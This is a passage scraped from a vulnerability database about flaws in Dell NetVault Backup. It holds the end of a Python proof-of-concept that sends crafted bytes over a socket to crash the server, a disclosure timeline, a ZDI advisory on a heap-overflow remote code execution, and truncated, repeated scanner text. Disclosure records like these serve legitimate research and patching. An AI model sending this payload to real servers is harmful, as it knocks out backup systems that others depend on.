\"\\x01\" \n \n#d += \"\\xCB\\x22\\x77\\xC9\" # Another crash example \nd += \"\\x18\\xE8\\xBE\\xC8\" # Will cause the crash \nd += \"\\x0B\\x00\\x00\\x00\" + \"AAAA\" + \"B\" * 6 \nd += \"\\x00\" # null byte \n \n## \n# send it \n \ns = so.socket(so.AF_INET, so.SOCK_STREAM) \ns.connect((server, port)) \ns.send(d) \ns.close() \n \n------------------------------------------------------------------------ \n----------------------- \n \nSolution: \n \nDisclosure timeline: \n2015-01-09 Vendor notified via email \n2015-05-26 Vendor notifies that the issue is fixed in version 10.0.5.x \n2015-07-30 Public disclosure. \n \nThe fix done by Dell was not checked by the researcher. \n \n------------------------------------------------------------------------ \n----------------------- \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/132928/dnb-dos.txt"}], "zdi": [{"lastseen": "2016-11-09T00:18:03", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Dell NetVault Backup. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the libnv6 module. By manipulating a serialized object's template string specifiers, an attacker can cause an integer overflow resulting in an undersized allocation and eventually a heap overflow. An attacker can leverage this vulnerability to execute code under the context of SYSTEM.", "modified": "2015-11-09T00:00:00", "published": "2015-05-26T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-15-240", "id": "ZDI-15-240", "title": "Dell NetVault Backup Heap Buffer Overflow Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}

Dell NetVault Backup 10.0.x &lt; 10.0.5 RCE

Description

The Dell NetVault Backup installed on the remote host is version 10.0.x prior to 10.0.5. It is, therefore, affected by the following vulnerabilities : A flaw exists in the libnv6 module due to an integer overflow condition. A remote attacker, by manipulating a serialized object

Dell NetVault Backup 10.0.x < 10.0.5 RCE

The Dell NetVault Backup installed on the remote host is version 10.0.x prior to 10.0.5. It is, therefore, affected by the following vulnerabilities :

A flaw exists in the libnv6 module due to an integer overflow condition. A remote attacker, by manipulating a serialized object